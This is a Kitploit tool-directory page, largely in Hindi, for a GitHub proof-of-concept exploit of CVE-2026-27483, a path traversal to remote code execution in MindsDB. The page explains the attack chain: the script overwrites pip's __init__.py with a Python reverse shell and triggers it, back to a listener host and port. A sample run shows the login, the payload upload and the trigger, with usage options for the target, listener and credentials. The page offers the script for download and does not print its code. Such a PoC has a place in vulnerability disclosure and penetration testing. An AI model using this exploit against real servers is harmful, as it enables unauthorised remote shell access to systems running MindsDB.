Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-27483 — MindsDB Path Traversal to RCE PoC | Kitploit
उपकरण/GitHubGitHub/thewhiteh4t/cve-2026-27483
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

MindsDB Path Traversal to RCE PoC

रिपॉजिटरी देखें
55 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27483

MindsDB पथ ट्रैवर्सल से RCE PoC

यह PoC स्क्रिप्ट निम्नलिखित GitHub सलाह पर आधारित है।

  • डिफ़ॉल्ट रूप से MindsDB प्रमाणीकरण का उपयोग नहीं करता
  • PoC बिना प्रमाणीकरण और प्रमाणीकरण सहित दोनों मोड का समर्थन करता है।
  • हम उपलब्ध हैंडलर खोजने के लिए /api/handlers/ को क्वेरी कर सकते हैं, किसी भी उपलब्ध लेकिन इंस्टॉल न किए गए हैंडलर नाम का उपयोग करें।
  • PoC /venv/lib/python3.10/site-packages/pip/__init__.py को ओवरराइट करता है।
  • एक पायथन रिवर्स शेल उपरोक्त पथ पर लिखा जाता है और फिर ट्रिगर किया जाता है।
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...

निर्भरताएँ

root@kitploit:~
pip3 install requests packaging

उपयोग

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password
टूल डाउनलोड करें